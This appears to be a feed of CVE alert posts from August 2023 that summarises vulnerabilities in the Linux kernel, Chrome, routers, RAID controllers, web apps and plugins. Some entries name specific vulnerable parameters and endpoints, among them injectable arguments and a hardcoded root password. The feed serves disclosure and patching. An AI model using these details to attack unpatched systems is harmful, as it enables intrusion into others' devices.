| 2023-08-22 14:58:35 |
🚨 CVE-2023-25913Because of an authentication flaw an attacker would be capable of generating a web report that discloses sensitive information such as internal IP addresses, usernames, store names and other sensitive information.🎖@cveNotify |
|
| 2023-08-22 14:58:34 |
🚨 CVE-2023-25914Due to improper restriction, attackers could retrieve and read system files of the underlying server through the XML interface.🎖@cveNotify |
|
| 2023-08-22 14:58:33 |
🚨 CVE-2023-25915Due to improper input validation, a remote attacker could execute arbitrary commands on the target system.🎖@cveNotify |
|
| 2023-08-22 14:58:31 |
🚨 CVE-2023-40352McAfee Safe Connect before 2.16.1.126 may allow an adversary with system privileges to achieve privilege escalation by loading arbitrary DLLs.🎖@cveNotify |
|
| 2023-08-22 14:58:30 |
🚨 CVE-2023-4373Inadequate validation of permissions when employing remote tools and macros within Devolutions Remote Desktop Manager versions 2023.2.19 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature.🎖@cveNotify |
|
| 2023-08-22 14:58:29 |
🚨 CVE-2023-4417Improper access controls in the entry duplication component in Devolutions Remote Desktop Manager 2023.2.19 and earlier versions on Windows allows an authenticated user, under specific circumstances, to inadvertently share their personal vault entry with shared vaults via an incorrect vault in the duplication write process.🎖@cveNotify |
|
| 2023-08-22 14:58:28 |
🚨 CVE-2023-4459A NULL pointer dereference flaw was found in vmxnet3_rq_cleanup in drivers/net/vmxnet3/vmxnet3_drv.c in the networking sub-component in vmxnet3 in the Linux Kernel. This issue may allow a local attacker with normal user privilege to cause a denial of service due to a missing sanity check during cleanup.🎖@cveNotify |
|
| 2023-08-22 00:58:14 |
🚨 CVE-2023-4301A cross-site request forgery (CSRF) vulnerability in Jenkins Fortify Plugin 22.1.38 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-08-22 00:58:13 |
🚨 CVE-2022-47952lxc-user-nic in lxc through 5.0.1 is installed setuid root, and may allow local users to infer whether any file exists, even within a protected directory tree, because "Failed to open" often indicates that a file does not exist, whereas "does not refer to a network namespace path" often indicates that a file exists. NOTE: this is different from CVE-2018-6556 because the CVE-2018-6556 fix design was based on the premise that "we will report back to the user that the open() failed but the user has no way of knowing why it failed"; however, in many realistic cases, there are no plausible reasons for failing except that the file does not exist.🎖@cveNotify |
|
| 2023-08-22 00:58:12 |
🚨 CVE-2022-34671NVIDIA GPU Display Driver for Windows contains a vulnerability in the user-mode layer, where an unprivileged user can cause an out-of-bounds write, which may lead to code execution, information disclosure, and denial of service.🎖@cveNotify |
|
| 2023-08-21 22:58:19 |
🚨 CVE-2023-25913Because of an authentication flaw an attacker would be capable of generating a web report that discloses sensitive information such as internal IP addresses, usernames, store names and other sensitive information.🎖@cveNotify |
|
| 2023-08-21 22:58:17 |
🚨 CVE-2023-25914Due to improper restriction, attackers could retrieve and read system files of the underlying server through the XML interface.🎖@cveNotify |
|
| 2023-08-21 22:58:16 |
🚨 CVE-2023-25915Due to improper input validation, a remote attacker could execute arbitrary commands on the target system.🎖@cveNotify |
|
| 2023-08-21 22:58:15 |
🚨 CVE-2023-36787Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-08-21 22:58:14 |
🚨 CVE-2023-38158Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-08-21 22:58:13 |
🚨 CVE-2023-29360Microsoft Streaming Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-08-21 20:58:30 |
🚨 CVE-2023-4334Broadcom RAID Controller Web server (nginx) is serving private files without any authentication🎖@cveNotify |
|
| 2023-08-21 20:58:29 |
🚨 CVE-2023-4336Broadcom RAID Controller web interface is vulnerable due to insecure default of HTTP configuration that does not safeguard cookies with Secure attribute🎖@cveNotify |
|
| 2023-08-21 20:58:28 |
🚨 CVE-2023-4338Broadcom RAID Controller web interface is vulnerable due to insecure default of HTTP configuration that does not provide X-Content-Type-Options Headers🎖@cveNotify |
|
| 2023-08-21 20:58:24 |
🚨 CVE-2023-4340Broadcom RAID Controller is vulnerable to Privilege escalation by taking advantage of the Session prints in the log file🎖@cveNotify |
|
| 2023-08-21 20:58:23 |
🚨 CVE-2023-4342Broadcom RAID Controller web interface is vulnerable due to insecure defaults of lacking HTTP strict-transport-security policy🎖@cveNotify |
|
| 2023-08-21 20:58:22 |
🚨 CVE-2023-4343Broadcom RAID Controller web interface is vulnerable due to exposure of sensitive password information in the URL as a URL search parameter🎖@cveNotify |
|
| 2023-08-21 20:58:18 |
🚨 CVE-2023-4323Broadcom RAID Controller web interface is vulnerable to improper session management of active sessions on Gateway setup🎖@cveNotify |
|
| 2023-08-21 20:58:17 |
🚨 CVE-2023-4326Broadcom RAID Controller web interface is vulnerable has an insecure default TLS configuration that supports obsolete SHA1-based ciphersuites🎖@cveNotify |
|
| 2023-08-21 20:58:13 |
🚨 CVE-2023-4328Broadcom RAID Controller web interface is vulnerable to exposure of sensitive data and the keys used for encryption are accessible to any local user on Linux🎖@cveNotify |
|
| 2023-08-21 20:58:12 |
🚨 CVE-2023-4330Broadcom RAID Controller web interface is vulnerable Denial of Service can be caused by an authenticated user to the REST API Interface🎖@cveNotify |
|
| 2023-08-21 20:58:11 |
🚨 CVE-2023-4331Broadcom RAID Controller web interface is vulnerable has an insecure default TLS configuration that support obsolete and vulnerable TLS protocols🎖@cveNotify |
|
| 2023-08-21 17:58:32 |
🚨 CVE-2023-32267A potential vulnerability has been identified in OpenText / Micro Focus ArcSight Management Center. The vulnerability could be remotely exploited.🎖@cveNotify |
|
| 2023-08-21 17:58:28 |
🚨 CVE-2021-28025Integer Overflow vulnerability in qsvghandler.cpp in Qt qtsvg versions 5.15.1, 6.0.0, 6.0.2, and 6.2, allows local attackers to cause a denial of service (DoS).🎖@cveNotify |
|
| 2023-08-21 17:58:27 |
🚨 CVE-2022-36392Improper input validation in some firmware for Intel(R) AMT and Intel(R) Standard Manageability before versions 11.8.94, 11.12.94, 11.22.94, 12.0.93, 14.1.70, 15.0.45, and 16.1.27 in Intel (R) CSME may allow an unauthenticated user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2023-08-21 17:58:26 |
🚨 CVE-2022-45112Improper access control in some Intel(R) VROC software before version 8.0.0.4035 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-21 17:58:22 |
🚨 CVE-2023-2802The Ultimate Addons for Contact Form 7 WordPress plugin before 3.1.29 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-08-21 17:58:21 |
🚨 CVE-2023-2606The WP Brutal AI WordPress plugin before 2.06 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-08-21 14:58:28 |
🚨 CVE-2023-4349Use after free in Device Trust Connectors in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-21 14:58:27 |
🚨 CVE-2023-21235In onCreate of LockSettingsActivity.java, there is a possible way set a new lockscreen PIN without entering the existing PIN due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-21 14:58:26 |
🚨 CVE-2020-28715An issue was discovered in kdmserver service in LeEco LeTV X43 version V2401RCN02C080080B04121S, allows attackers to execute arbitrary code, escalate privileges, and cause a denial of service (DoS).🎖@cveNotify |
|
| 2023-08-21 14:58:23 |
🚨 CVE-2023-38899SQL injection vulnerability in berkaygediz O_Blog v.1.0 allows a local attacker to escalate privileges via the secure_file_priv component.🎖@cveNotify |
|
| 2023-08-21 14:58:22 |
🚨 CVE-2023-40735Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BUTTERFLY BUTTON PROJECT - BUTTERFLY BUTTON (Architecture) allows loss of plausible deniability, confidentiality.This issue affects BUTTERFLY BUTTON: As of 2023-08-21.🎖@cveNotify |
|
| 2023-08-21 14:58:21 |
🚨 CVE-2023-4455Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.6.3.🎖@cveNotify |
|
| 2023-08-21 12:58:13 |
🚨 CVE-2023-4453Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 10.6.8.🎖@cveNotify |
|
| 2023-08-21 12:58:12 |
🚨 CVE-2023-4455Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.6.3.🎖@cveNotify |
|
| 2023-08-21 10:58:27 |
🚨 CVE-2023-39543Cross-site scripting vulnerability in LuxCal Web Calendar prior to 5.2.3M (MySQL version) and LuxCal Web Calendar prior to 5.2.3L (SQLite version) allows a remote unauthenticated attacker to execute an arbitrary script on the web browser of the user who is using the product.🎖@cveNotify |
|
| 2023-08-21 10:58:23 |
🚨 CVE-2023-40068Cross-site scripting vulnerability in Advanced Custom Fields versions 6.1.0 to 6.1.7 and Advanced Custom Fields Pro versions 6.1.0 to 6.1.7 allows a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product with the administrative privilege.🎖@cveNotify |
|
| 2023-08-21 10:58:22 |
🚨 CVE-2023-39851** DISPUTED ** webchess v1.0 was discovered to contain a SQL injection vulnerability via the $playerID parameter at mainmenu.php. NOTE: this is disputed by a third party who indicates that the playerID is a session variable controlled by the server, and thus cannot be used for exploitation.🎖@cveNotify |
|
| 2023-08-21 10:58:21 |
🚨 CVE-2023-39852** DISPUTED ** Doctormms v1.0 was discovered to contain a SQL injection vulnerability via the $userid parameter at myAppoinment.php. NOTE: this is disputed by a third party who indicates that the userid is a session variable controlled by the server, and thus cannot be used for exploitation.🎖@cveNotify |
|
| 2023-08-21 05:58:39 |
🚨 CVE-2023-39750D-Link DAP-2660 v1.13 was discovered to contain a buffer overflow via the f_ipv6_enable parameter at /bsc_ipv6. This vulnerability is exploited via a crafted POST request.🎖@cveNotify |
|
| 2023-08-21 05:58:38 |
🚨 CVE-2023-39751TP-Link TL-WR941ND V6 were discovered to contain a buffer overflow via the pSize parameter at /userRpm/PingIframeRpm.🎖@cveNotify |
|
| 2023-08-21 05:58:36 |
🚨 CVE-2023-4450A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.1 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-237571.🎖@cveNotify |
|
| 2023-08-21 05:58:35 |
🚨 CVE-2023-4016Under some circumstances, this weakness allows a user who has access to run the “ps” utility on a machine, the ability to write almost unlimited amounts of unfiltered data into the process heap.🎖@cveNotify |
|
| 2023-08-21 05:58:34 |
🚨 CVE-2023-20593An issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.🎖@cveNotify |
|
| 2023-08-21 05:58:33 |
🚨 CVE-2023-39617TOTOLINK X5000R_V9.1.0cu.2089_B20211224 and X5000R_V9.1.0cu.2350_B20230313 were discovered to contain a remote code execution (RCE) vulnerability via the lang parameter in the setLanguageCfg function.🎖@cveNotify |
|
| 2023-08-21 05:58:32 |
🚨 CVE-2023-39618TOTOLINK X5000R B20210419 was discovered to contain a remote code execution (RCE) vulnerability via the setTracerouteCfg interface.🎖@cveNotify |
|
| 2023-08-21 05:58:31 |
🚨 CVE-2023-4447A vulnerability has been found in OpenRapid RapidCMS 1.3.1 and classified as critical. This vulnerability affects unknown code of the file admin/article-chat.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237568.🎖@cveNotify |
|
| 2023-08-21 05:58:29 |
🚨 CVE-2023-4448A vulnerability was found in OpenRapid RapidCMS 1.3.1 and classified as critical. This issue affects some unknown processing of the file admin/run-movepass.php. The manipulation of the argument password/password2 leads to weak password recovery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 4dff387283060961c362d50105ff8da8ea40bcbe. It is recommended to apply a patch to fix this issue. The identifier VDB-237569 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-21 05:58:28 |
🚨 CVE-2023-4449A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /index.php?page=member. The manipulation of the argument columns[0][data] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-237570 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-21 05:58:24 |
🚨 CVE-2023-40251Missing Encryption of Sensitive Data vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Man in the Middle Attack.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-21 05:58:23 |
🚨 CVE-2023-40252Improper Control of Generation of Code ('Code Injection') vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Replace Trusted Executable.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-21 05:58:22 |
🚨 CVE-2023-40253Improper Authentication vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Authentication Abuse.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-21 05:58:21 |
🚨 CVE-2023-39784Tenda AC8V4 V16.03.34.06 was discovered to contain a stack overflow via the list parameter in the save_virtualser_data function.🎖@cveNotify |
|
| 2023-08-21 05:58:20 |
🚨 CVE-2023-39785Tenda AC8V4 V16.03.34.06 was discovered to contain a stack overflow via the list parameter in the set_qosMib_list function.🎖@cveNotify |
|
| 2023-08-21 05:58:16 |
🚨 CVE-2023-39786Tenda AC8V4 V16.03.34.06 was discovered to contain a stack overflow via the time parameter in the sscanf function.🎖@cveNotify |
|
| 2023-08-21 05:58:15 |
🚨 CVE-2023-39807N.V.K.INTER CO., LTD. (NVK) iBSG v3.5 was discovered to contain a SQL injection vulnerability via the a_passwd parameter at /portal/user-register.php.🎖@cveNotify |
|
| 2023-08-21 05:58:14 |
🚨 CVE-2023-39808N.V.K.INTER CO., LTD. (NVK) iBSG v3.5 was discovered to contain a hardcoded root password which allows attackers to login with root privileges via the SSH service.🎖@cveNotify |
|
| 2023-08-21 05:58:13 |
🚨 CVE-2023-39809N.V.K.INTER CO., LTD. (NVK) iBSG v3.5 was discovered to contain a command injection vulnerability via the system_hostname parameter at /manage/network-basic.php.🎖@cveNotify |
|
| 2023-08-21 05:58:12 |
🚨 CVE-2023-4443A vulnerability classified as critical has been found in SourceCodester Free Hospital Management System for Small Practices 1.0/5.0.12. Affected is an unknown function of the file vm\doctor\edit-doc.php. The manipulation of the argument id00/nic/oldemail/email/spec/Tele leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237564.🎖@cveNotify |
|
| 2023-08-21 01:58:22 |
🚨 CVE-2023-4438A vulnerability has been found in SourceCodester Inventory Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file app/ajax/search_sales_report.php. The manipulation of the argument customer leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-237559.🎖@cveNotify |
|
| 2023-08-21 01:58:21 |
🚨 CVE-2023-4439A vulnerability was found in SourceCodester Card Holder Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Minus Value Handler. The manipulation leads to improper validation of specified quantity in input. The attack may be launched remotely. The identifier of this vulnerability is VDB-237560.🎖@cveNotify |
|
| 2023-08-21 01:58:19 |
🚨 CVE-2023-4436A vulnerability, which was classified as critical, has been found in SourceCodester Inventory Management System 1.0. This issue affects some unknown processing of the file app/action/edit_update.php. The manipulation of the argument user_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-237557 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-21 01:58:18 |
🚨 CVE-2023-4437A vulnerability, which was classified as critical, was found in SourceCodester Inventory Management System 1.0. Affected is an unknown function of the file app/ajax/search_sell_paymen_report.php. The manipulation of the argument customer leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-237558 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-20 22:58:11 |
🚨 CVE-2023-30861Flask is a lightweight WSGI web application framework. When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches `Set-Cookie` headers, it may send one client's `session` cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met.1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies.2. The application sets `session.permanent = True`3. The application does not access or modify the session at any point during a request.4. `SESSION_REFRESH_EACH_REQUEST` enabled (the default).5. The application does not set a `Cache-Control` header to indicate that a page is private or should not be cached.This happens because vulnerable versions of Flask only set the `Vary: Cookie` header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. This issue has been fixed in versions 2.3.2 and 2.2.5.🎖@cveNotify |
|
| 2023-08-20 20:58:12 |
🚨 CVE-2022-24989TerraMaster NAS through 4.2.30 allows remote WAN attackers to execute arbitrary code as root via the raidtype and diskstring parameters for PHP Object Instantiation to the api.php?mobile/createRaid URI. (Shell metacharacters can be placed in raidtype because popen is used without any sanitization.) The credentials from CVE-2022-24990 exploitation can be used.🎖@cveNotify |
|
| 2023-08-20 20:58:11 |
🚨 CVE-2023-36674An issue was discovered in MediaWiki before 1.35.11, 1.36.x through 1.38.x before 1.38.7, 1.39.x before 1.39.4, and 1.40.x before 1.40.1. It is possible to bypass the Bad image list (aka badFile) by using the thumb parameter (aka Manualthumb) of the File syntax.🎖@cveNotify |
|
| 2023-08-20 16:58:11 |
🚨 CVE-2023-4451Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.🎖@cveNotify |
|
| 2023-08-20 10:58:18 |
🚨 CVE-2023-37250Unity Parsec before 8 has a TOCTOU race condition that permits local attackers to escalate privileges to SYSTEM if Parsec was installed in "Per User" mode. The application intentionally launches DLLs from a user-owned directory but intended to always perform integrity verification of those DLLs.🎖@cveNotify |
|
| 2023-08-20 10:58:17 |
🚨 CVE-2023-37369In Qt before 5.15.15, 6.x before 6.2.9, and 6.3.x through 6.5.x before 6.5.2, there can be an application crash in QXmlStreamReader via a crafted XML string that triggers a situation in which a prefix is greater than a length.🎖@cveNotify |
|
| 2023-08-20 06:58:12 |
🚨 CVE-2023-2318DOM-based XSS in src/muya/lib/contentState/pasteCtrl.js in MarkText 0.17.1 and before on Windows, Linux and macOS allows arbitrary JavaScript code to run in the context of MarkText main window. This vulnerability can be exploited if a user copies text from a malicious webpage and paste it into MarkText.🎖@cveNotify |
|
| 2023-08-19 22:00:37 |
🚨 CVE-2023-3609A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation.If tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.We recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.🎖@cveNotify |
|
| 2023-08-19 22:00:36 |
🚨 CVE-2023-3338A null pointer dereference flaw was found in the Linux kernel's DECnet networking protocol. This issue could allow a remote user to crash the system.🎖@cveNotify |
|
| 2023-08-19 22:00:35 |
🚨 CVE-2023-3090A heap out-of-bounds write vulnerability in the Linux Kernel ipvlan network driver can be exploited to achieve local privilege escalation.The out-of-bounds write is caused by missing skb->cb initialization in the ipvlan network driver. The vulnerability is reachable if CONFIG_IPVLAN is enabled.We recommend upgrading past commit 90cbed5247439a966b645b34eb0a2e037836ea8e.🎖@cveNotify |
|
| 2023-08-19 22:00:33 |
🚨 CVE-2023-3389A use-after-free vulnerability in the Linux Kernel io_uring subsystem can be exploited to achieve local privilege escalation.Racing a io_uring cancel poll request with a linked timeout can cause a UAF in a hrtimer.We recommend upgrading past commit ef7dfac51d8ed961b742218f526bd589f3900a59 (4716c73b188566865bdd79c3a6709696a224ac04 for 5.10 stable and 0e388fce7aec40992eadee654193cad345d62663 for 5.15 stable).🎖@cveNotify |
|
| 2023-08-19 22:00:32 |
🚨 CVE-2023-3212A NULL pointer dereference issue was found in the gfs2 file system in the Linux kernel. It occurs on corrupt gfs2 file systems when the evict code tries to reference the journal descriptor structure after it has been freed and set to NULL. A privileged local user could use this flaw to cause a kernel panic.🎖@cveNotify |
|
| 2023-08-19 22:00:31 |
🚨 CVE-2023-35788An issue was discovered in fl_set_geneve_opt in net/sched/cls_flower.c in the Linux kernel before 6.3.7. It allows an out-of-bounds write in the flower classifier code via TCA_FLOWER_KEY_ENC_OPTS_GENEVE packets. This may result in denial of service or privilege escalation.🎖@cveNotify |
|
| 2023-08-19 22:00:29 |
🚨 CVE-2023-3268An out of bounds (OOB) memory access flaw was found in the Linux kernel in relay_file_read_start_pos in kernel/relay.c in the relayfs. This flaw could allow a local attacker to crash the system or leak kernel internal information.🎖@cveNotify |
|
| 2023-08-19 22:00:28 |
🚨 CVE-2023-3111A use after free vulnerability was found in prepare_to_relocate in fs/btrfs/relocation.c in btrfs in the Linux Kernel. This possible flaw can be triggered by calling btrfs_ioctl_balance() before calling btrfs_ioctl_defrag().🎖@cveNotify |
|
| 2023-08-19 22:00:26 |
🚨 CVE-2023-31084An issue was discovered in drivers/media/dvb-core/dvb_frontend.c in the Linux kernel 6.2. There is a blocking operation when a task is in !TASK_RUNNING. In dvb_frontend_get_event, wait_event_interruptible is called; the condition is dvb_frontend_test_event(fepriv,events). In dvb_frontend_test_event, down(&fepriv->sem) is called. However, wait_event_interruptible would put the process to sleep, and down(&fepriv->sem) may block the process.🎖@cveNotify |
|
| 2023-08-19 22:00:25 |
🚨 CVE-2023-20588A division-by-zero error on some AMD processors can potentially return speculative data resulting in loss of confidentiality. 🎖@cveNotify |
|
| 2023-08-19 22:00:23 |
🚨 CVE-2023-21255In multiple functions of binder.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-19 22:00:22 |
🚨 CVE-2023-21400In multiple functions of io_uring.c, there is a possible kernel memory corruption due to improper locking. This could lead to local escalation of privilege in the kernel with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-19 22:00:21 |
🚨 CVE-2023-1206A hash collision flaw was found in the IPv6 connection lookup table in the Linux kernel’s IPv6 functionality when a user makes a new kind of SYN flood attack. A user located in the local network or with a high bandwidth connection can increase the CPU usage of the server that accepts IPV6 connections up to 95%.🎖@cveNotify |
|
| 2023-08-19 22:00:19 |
🚨 CVE-2023-2898There is a null-pointer-dereference flaw found in f2fs_write_end_io in fs/f2fs/data.c in the Linux kernel. This flaw allows a local privileged user to cause a denial of service problem.🎖@cveNotify |
|
| 2023-08-19 22:00:18 |
🚨 CVE-2023-2002A vulnerability was found in the HCI sockets implementation due to a missing capability check in net/bluetooth/hci_sock.c in the Linux Kernel. This flaw allows an attacker to unauthorized execution of management commands, compromising the confidentiality, integrity, and availability of Bluetooth communication.🎖@cveNotify |
|
| 2023-08-19 22:00:17 |
🚨 CVE-2023-2124An out-of-bounds memory access flaw was found in the Linux kernel’s XFS file system in how a user restores an XFS image after failure (with a dirty log journal). This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-08-19 22:00:15 |
🚨 CVE-2023-2269A denial of service problem was found, due to a possible recursive locking scenario, resulting in a deadlock in table_clear in drivers/md/dm-ioctl.c in the Linux Kernel Device Mapper-Multipathing sub-component.🎖@cveNotify |
|
| 2023-08-19 22:00:14 |
🚨 CVE-2023-2007The specific flaw exists within the DPT I2O Controller driver. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the kernel.🎖@cveNotify |
|
| 2023-08-19 22:00:13 |
🚨 CVE-2023-1380A slab-out-of-bound read problem was found in brcmf_get_assoc_ies in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c in the Linux Kernel. This issue could occur when assoc_info->req_len data is bigger than the size of the buffer, defined as WL_EXTRA_BUF_MAX, leading to a denial of service.🎖@cveNotify |
|
| 2023-08-19 22:00:12 |
🚨 CVE-2022-4269A flaw was found in the Linux kernel Traffic Control (TC) subsystem. Using a specific networking configuration (redirecting egress packets to ingress using TC action "mirred") a local unprivileged user could trigger a CPU soft lockup (ABBA deadlock) when the transport protocol in use (TCP or SCTP) does a retransmission, resulting in a denial of service condition.🎖@cveNotify |
|
| 2023-08-19 12:00:59 |
🚨 CVE-2023-2318DOM-based XSS in src/muya/lib/contentState/pasteCtrl.js in MarkText 0.17.1 and before on Windows, Linux and macOS allows arbitrary JavaScript code to run in the context of MarkText main window. This vulnerability can be exploited if a user copies text from a malicious webpage and paste it into MarkText.🎖@cveNotify |
|
| 2023-08-19 12:00:58 |
🚨 CVE-2023-2971Improper path handling in Typora before 1.7.0-dev on Windows and Linux allows a crafted webpage to access local files and exfiltrate them to remote web servers via "typora://app/typemark/". This vulnerability can be exploited if a user opens a malicious markdown file in Typora, or copies text from a malicious webpage and paste it into Typora.🎖@cveNotify |
|
| 2023-08-19 06:01:41 |
🚨 CVE-2022-4918Use after free in UI in Google Chrome prior to 102.0.5005.61 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-19 06:01:40 |
🚨 CVE-2022-4920Heap buffer overflow in Blink in Google Chrome prior to 101.0.4951.41 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-19 06:01:39 |
🚨 CVE-2022-3443Insufficient data validation in File System API in Google Chrome prior to 106.0.5249.62 allowed a remote attacker to bypass File System restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-08-19 06:01:38 |
🚨 CVE-2022-3444Insufficient data validation in File System API in Google Chrome prior to 106.0.5249.62 allowed a remote attacker to bypass File System restrictions via a crafted HTML page and malicious file. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-08-19 06:01:35 |
🚨 CVE-2022-2477Use after free in Guest View in Google Chrome prior to 103.0.5060.134 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2023-08-19 06:01:34 |
🚨 CVE-2022-2479Insufficient validation of untrusted input in File in Google Chrome on Android prior to 103.0.5060.134 allowed an attacker who convinced a user to install a malicious app to obtain potentially sensitive information from internal file directories via a crafted HTML page.🎖@cveNotify |
|
| 2023-08-19 06:01:33 |
🚨 CVE-2022-2481Use after free in Views in Google Chrome prior to 103.0.5060.134 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via UI interaction.🎖@cveNotify |
|
| 2023-08-19 06:01:29 |
🚨 CVE-2022-1919Use after free in Codecs in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2023-08-19 06:01:28 |
🚨 CVE-2023-4432Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.🎖@cveNotify |
|
| 2023-08-19 06:01:27 |
🚨 CVE-2023-3997Splunk SOAR versions lower than 6.1.0 are indirectly affected by a potential vulnerability accessed through the user’s terminal. A third party can send Splunk SOAR a maliciously crafted web request containing special ANSI characters to cause log file poisoning. When a terminal user attempts to view the poisoned logs, this can tamper with the terminal and cause possible malicious code execution from the terminal user’s action.🎖@cveNotify |
|
| 2023-08-19 06:01:23 |
🚨 CVE-2022-46706A type confusion issue was addressed with improved state handling. This issue is fixed in Security Update 2022-003 Catalina, macOS Monterey 12.3, macOS Big Sur 11.6.5. An application may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-08-19 06:01:22 |
🚨 CVE-2023-38857Buffer Overflow vulnerability infaad2 v.2.10.1 allows a remote attacker to execute arbitrary code and cause a denial of service via the stcoin function in mp4read.c.🎖@cveNotify |
|
| 2023-08-19 06:01:21 |
🚨 CVE-2023-38851Buffer Overflow vulnerability in libxlsv.1.6.2 allows a remote attacker to execute arbitrary code and cause a denial of service via a crafted XLS file to the xls_parseWorkBook function in xls.c:1018.🎖@cveNotify |
|
| 2023-08-19 00:58:19 |
🚨 CVE-2023-38839SQL injection vulnerability in Kidus Minimati v.1.0.0 allows a remote attacker to obtain sensitive information via theID parameter in the fulldelete.php component.🎖@cveNotify |
|
| 2023-08-19 00:58:18 |
